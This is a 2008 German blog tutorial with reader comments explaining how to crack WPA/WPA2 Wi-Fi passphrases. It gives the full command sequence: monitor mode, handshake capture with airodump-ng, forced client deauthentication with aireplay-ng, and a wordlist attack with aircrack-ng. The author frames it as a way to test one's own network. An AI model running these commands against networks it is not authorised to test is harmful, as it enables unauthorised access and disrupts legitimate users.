[Tutorial] WPA gesichertes WLAN ‘hacken’

// April 3rd, 2008 // Blog / Website, IT, Links, Security, Termine, Tutorials

Aufbauen auf meinem Artikel 'WEP gesichertes WLAN knacken (Fragmentation Attack)' möchte ich nun mit diesem Beitrag aufzeigen, dass auch die WPA bzw. WPA2 Verschlüsselung ihre 'Schwachstellen' hat.

Im Gegensatz zu WEP hat WPA / WPA2 selbst keine 'Schwachstelle'. Zwar kann beim Herstellen einer Clientverbindung der Authentifizierungs-Handshake mitgelesen und aufgezeichnet werden, jedoch bringt dieser dem Angreifer herzlich wenig, wenn ein vernünftiges Passwort verwendet wird. Der Angriff auf diesen Handshake und das darin enthaltene Passwort kann bisher nur mittels Wortlisten-Attacken und Bruteforce erfolgen. Bei einem starken Passwort kann dies mehrere Jahre oder sogar Jahrzehnte dauern.

Ein Tipp noch vorweg:
Am bequemsten ist es, wenn man die benötigten Informationen wie 'BSSID', 'ESSID', 'Client-MAC', etc. in Variablen speichert. So kann man schnell und einfach auf die Inhalte zugreifen, ohne diese jedes mal neu tippen oder per Copy&Paste einfügen zu müssen.

Informationen (die gleichen wie beim WEP-Crack)

BSSID des AP: 00:12:BF:46:68:BD

ESSID des AP: N3ur0m4nc3r

Kanal des AP: 01

MAC des WLAN-Adapters: 00:C0:CA:19:FF:86

WLAN-Adapter muss Packetinjection und

Monitor Mode unterstützen.

Als Betriebssytem habe ich Backtrack 3 verwendet, welches ich unter VMware installiert habe.

Anleitung

  1. Starten des benötigten Interface (in diesem Falle wlan0)
    ifconfig wlan0 up
  2. Aktivieren des Monitor-Modus für den Kanal 1 (auf welchem unser AP arbeitet)
    airmon-ng start wlan0 1
  3. Nun wird airodump-ng mit den entsprechenden Parametern gestartet:
    -c 1 für Kanal 1
    -w Dateiname für die zu speichernde Datei
    --bssid Mac-Adresse des APs
    wlan0 das Interface
    airodump-ng -c 1 -w neuro-wpa2 --bssid 00:12:BF:46:68:BD wlan0
  4. Damit wir auch einen Handshake mitlesen können, muss sich ein Client anmelden während der Datenverkehr von airodump-ng aufgezeichnet wird.
    Um sämtliche Clients, welche zur Zeit mit dem AP verbunden sind zu trennen (und sie so zum Wiederverbinden zu animieren) kann mit aireplay-ng ein DeAuth erzwungen werden.
    -0 4 --> es werden 4 DeAuth-Pakete versandt
    -a --> Mac-Adresse des AP
    -c --> Mac-Adresse des Client
    aireplay-ng -0 4 -a 00:12:BF:46:68:BD -c 00:15:00:02:C8:82
    wpa deauth thumb [Tutorial] WPA gesichertes WLAN hacken
  5. Sobald der Handshake aufgezeichnet wurde, kann aircrack-ng auf das Passwort angesetzt werden. Dieses kann, wie schon oben geschrieben, mittels Passwortliste oder Bruteforce-Angriff erfolgen.
    wpa handshake thumb [Tutorial] WPA gesichertes WLAN hacken
    -a 2 --> Angriff auf WPA / WPA2
    -b --> Mac-Adresse des AP
    -e --> essid des AP
    -w --> Pfad bzw. Dateiname der Wortlisten (können auch mehrere sein)
    aircrack-ng -a 2 -b 00:12:BF:46:68:BD -e N3ur0m4nc3r -w <passwordfile> *.cap

    wpa aircrack thumb [Tutorial] WPA gesichertes WLAN hacken

Ich möchte jedoch nochmal darauf hin weisen, dass man in fremden Netzwerk nichts zu suchen hat, sofern man nicht die Erlaubnis vom Eigentümer erhalten hat.

Am besten testet man dies alles nur in seinem privaten Netzwerk.

32 Responses to “[Tutorial] WPA gesichertes WLAN ‘hacken’”

  1. datenritter blog says:
    6. April 2008 at 16:29

    [...] WEP-Crack-Turorial nun auch die Anleitung zum Angeifen schwacher WPA-Passphrases veröffentlicht, und zwar hier. Die Methode ist einfach: Man de-authentifiziert alle Clients, die an dem AP angemeldet sind, und [...]

    Reply
  2. Julian Kessel says:
    22. May 2008 at 17:38

    Sehr schön geschriebenes und beschriebenes tut vielen Dank für ihre Mühe :D
    weiter so !

    Reply
  3. moebb says:
    29. July 2008 at 02:22

    absolut unzureichendes tutorial... verwendung von john mit stdout nich erklärt..und was noch wichtiger ist: erklärung zu precompiled hashtables fehlt völlig... wäre aber für nen grundlagentut erforderlich, weil wpa cracking doch ohne diese keinen sinn macht;-)

    wenn man tuts schreibt, sollte man wenigstens die seite zum tool mal gelesen haben--->www.aircrack-ng.org

    Reply
  4. Torsten Feld says:
    29. July 2008 at 07:01

    @moebb:
    1. john the ripper sollte bei diesem Tutorial auch nicht Inhalt sein. Hier stand im Vordergrund aufzuzeigen, dass auch WPA seine Schwachstellen hat. John wäre aber mal ein eigenes Tutorial wert.

    2. Precompiled Hashtables sind beim WPA 'knacken' so überflüssig wie ein Kropf. Da bei WPA die ESSID mit in den Schlüssel einfließt, müsste man für jede ESSID eigene Hashtables entwerfen, was sowohl vom Speicherplatz als auch aus zeitlicher Sicht keinen Sinn macht.

    3. Da meine Tutorials direkt auf der Seite des Tools verlnkt wird, können Sie so schlecht ja nicht sein. ;)

    4. Vielleicht solltest Dich vorher selbst mal informieren und nicht so feige sein und eine gefakete E-Mail-Adresse angeben. :)

    Reply
  5. moebb says:
    29. July 2008 at 13:45

    hey torsten...

    erstmal hab ich weder Deinen namen noch ein link zu Dir auf der aircrack-ng seite gefunden.. vielleicht sagst Du mal genauer wo das sein soll.

    dann hast Du natürlich recht..hashtables kann man net gebrauchen..weiß garnich warum ich das so genannt habe, wollte ich nicht! aber eben sowas in der art:-D gibt es..aus jeweiliger essid und ner angepasten passwortliste ne sql liste machen und so dazugehörige pairwise master keys erstellen und "storen"...das erhöht die prüfungsgeschwindigkeit ungemein! auch wenn es selbstverständlich immer noch net wirklich praktikabel ist, geht alles doch in die richtige richtung. für eine gruppe von leuten ist aber damit schon mehr an nem wpa netz machbar...

    ich werde mal gucken, ob Du andere interessante tuts online hast. und ja mach doch mal ein deutsches tut zu john!.. ick glaube sowas gibts in diesem zusammenhang net ausführlich

    Reply
  6. Torsten Feld says:
    30. July 2008 at 13:50

    Der zweite und dritte Link hier.
    Auch aus PMK und und essid würde eine entsprechende Liste keinen großen Sinn machen. Da man eh für nahezu jedes WPA-WLAN eine neue Liste erstellen müsste, kann man auch gleich Bruteforcen oder Passwortlisten einsetzen. Abgesehen davon, dass das Ganze sowieso illegal ist und man die ganze Geschichte nur mal für zu Hause zum Testen der eigenen Sicherheit testen sollte.

    Sofern ich mal wieder mehr Zeit habe, was momentan nicht der Fall ist, werde ich mich evtl. mal daran setzen.

    Reply
  7. Max says:
    28. October 2008 at 15:33

    Es ist uebrigends nicht moeglich auf die WPA Handshakes per Aircrack mit Bruteforce los zugehen. Nur per Wordlist und das ist schwierig. Ich erachte WPA als ziemlich sicher.

    Reply
  8. pastacode says:
    11. November 2008 at 14:35

    >Auch aus PMK und und essid würde eine entsprechende Liste >keinen großen Sinn machen. Da man eh für nahezu jedes >WPA-WLAN eine neue Liste erstellen müsste, kann man auch >gleich Bruteforcen oder Passwortlisten einsetzen.

    Entsprechende Listen (genauer: Rainbowtables) gibt es bereits im Netz zu finden. Hier hat man einfach die 1000 beliebtesten ESSID's alla Default, NETGEAR... etc... mit jeweils 1 Millionen Passwörtern aus einer Wortliste kombiniert. Sinn macht das ganze deswegen schon...

    Reply
  9. Torsten Feld says:
    12. November 2008 at 18:58

    WPA ist so gut wie geschichte, auch ohne Rainbowtables. Mit der Software von Elcomsoft und dicken NVIDIA-GPUs sind die meisten Passwörter jetzt schon kein Problem mehr. Außerdem soll die Tage eine Schwachstelle in TKIP veröffentlicht werden, die es ermöglich den Schlüssel innerhalb von ca. 15 Minuten zu knacken (http://www.gulli.com/news/wlan-sicherheit-wpa-verschl-2008-11-07/).

    Reply
  10. unbekannt says:
    22. November 2008 at 16:29

    wenn wpa nicht mehr sicher ist, was soll man da dann noch als "Otto-Normal-Benutzer" machen?

    Reply
  11. Torsten Feld says:
    22. November 2008 at 16:57

    @unbekannt: WPA2 nutzen ;)

    Reply
  12. TheBlueSmile says:
    19. December 2008 at 14:35

    Du könntest als sicheres Wlan so gestalten

    Wpa2 Shared Key (der key wechselt immer , im betrieb)

    Dazu machst du ein eigenes Subnetzwerk.

    Dhcp dienst aus

    und eine hand voll ip addressen die nur zugriff auf den Ap / Internet haben am besten kombiniert mit Ip & mac

    achja deine Keys bitte so wählen das groß,klein,sonderzeichen und zahlen drin sind.

    Sorry für Rechtschreibung ^^

    mfg Tbs

    ps: ein Lehrer hat das von uns und wir durften es versuchen zu knacken richtig schweres ding (wir habens nicht geschaft)

    Reply
  13. Timo says:
    22. December 2008 at 15:32

    Hallo
    habe eine edimax wirelass lan pci adapter IEEE 802.11g Turbo Mode wo finde ich den Treiber für den Monior mode?

    kann mir jemand helfen??

    Danke

    Reply
  14. Timo says:
    24. December 2008 at 23:42

    Danke für die schnelle antwort. habe einen Chipsatz von Ralink Turbo Wireless Lan Card #2.
    Habe überall gesucht, jedoch nichts gefunden...

    Gruß Timo

    Reply
  15. Timo says:
    25. December 2008 at 11:19

    ja da hast du recht^^also auf dem link war ich auch schon und nichts gefunden :-( ......
    gibt es eine kosten günstige card die den monitor mode unterstüzt?

    Frohe Weihnachten

    Reply
  16. Timo says:
    25. December 2008 at 11:30

    Erst mal auch ein danke schön für deine schnellen antworten, find ich echt gut..
    kann man wlan auch mit einenm anderen programm hacken indem ich nicht den monitor mode bauch??

    Reply
    • Torsten Feld says:
      25. December 2008 at 12:33

      WLAN-Adapter gibt es sicher einige, die günstig sind und sich in den Monitor-Mode schalten lassen. Kommt aber eben darauf an, was Du suchst (USB, PCI, PCMCIA). Der 111er von Netgear kann auch Monitor-Mode, meine ich. Müsstest Du aber einfach mal nachschauen.

      Du brauchst nicht zwingend aircrack, aber den Monitor-Mode benötigst Du auf jeden Fall.

      Dir auch frohe Weihnachten.

      Reply
  17. dani says:
    29. December 2008 at 22:01

    Tolles Tutorial!

    Irgendwo war glaube ich ein kleiner Fehler... bei Schritt 4:
    aireplay-ng -0 4 -a 00:12:BF:46:68:BD -c 00:15:00:02:C8:82
    Hier muss noch das WLAN-Device angegeben werden, also in diesem Fall:
    aireplay-ng -0 4 -a 00:12:BF:46:68:BD -c 00:15:00:02:C8:82 wlan0

    Noch eine Frage... mein WLAN-Netzwerk verwendet WPA2-PSK (AES). Ich kenne den Key (hexadezimal).
    Natürlich würde das nur mit Bruteforce gehen (oder?). Deshalb wollte ich einfach den Key in die mit aircrack-ng mitgelieferte wordlist einfügen. Aber wie wandle ich den WPA2-PSK in ASCII um?
    Außerdem hab ich da zwei Keys... einen 10 stelligen hexadezimalen Key (steht in der Routerconfig) und einen ziemlich langen Key der im Ubuntu-NetworkManager gespeichert ist. Was ist denn jetzt der Key??

    Sorry, wenn ich mit meinen Fragen nerve, aber ich interessiere mich sehr für solche Sachen ^^

    Lg

    Reply
  18. paranoiax says:
    30. December 2008 at 12:03

    eine frage:
    wenn die essid aus 2 getrennten Wörtern besteht (zB: WLAN BLAKEKS), wie gebe ich diese dann ein? soll ich sie in anführungszeichen setzen? zB. so= "WLAN BLAKEKS"

    Reply
  19. drzero says:
    5. January 2009 at 09:32

    Hallo,

    soweit klappt das ja recht gut nur bekomme ich mit dem C54RU USb Stick von Conceptronic keinen handshake zustande hat da vllt jmd ähnlich erfahrungen bzw ne ahnung ob das an fehlender packer injection fähigkeit liegen kann?

    mfg

    Reply
  20. drzero says:
    6. January 2009 at 15:58

    Hallo, und thx für die schnelle aw

    Ralink rt2x00

    wäre der chipsatz bzw treiber

    mfg

    Reply
  21. pastacode says:
    10. January 2009 at 16:36

    Die momentan sicherste Methode ist wohl Enterprise WPA. Das wird an meiner und auch vielen anderen Uni's vewendet, stellt aber einen gewissen Aufwand da, wenn man es denn auch zuhause verwenden möchte. (Wikipedia - 802.1x)

    Vielleicht haben ja bereits einige Consumer-Router diesen Standart - verglichen mit WPA2 ist das ein großer Sicherheitsgewinn.

    Reply
    • Torsten Feld says:
      12. January 2009 at 19:25

      Ist auf jeden Fall sehr sicher, da aber wohl die wenigsten einen 802.1x fähigen Router zu Hause haben und wohl erst recht keinen eigenständigen RADIUS-Server (z.B. Windows IAS oder Linux), ist WPA2 mit entsprechend langem und kryptischem Passwort schon sicher genug. :)

      Reply
  22. spinnt ihr says:
    7. June 2009 at 23:32

    sach ma habt ihr knall? ich meld das den bulln

    Reply
    • Torsten says:
      8. June 2009 at 08:21

      Die Frage ist: "Hast Du einen?" - Hier wird lediglich aufgezeigt, wie einfach es ist, WEP bzw. WPA mit schwachen Passwörtern zu knacken, damit auch der Otto-Normalverbraucher sich mit der Sicherheit seines WLANs auseinandersetzt und es entsprechend sichert. Wenn Du Dich vor Polizei und Staatsanwalt blamieren möchtest, geh halt hin. ;)

      Reply

Leave a Reply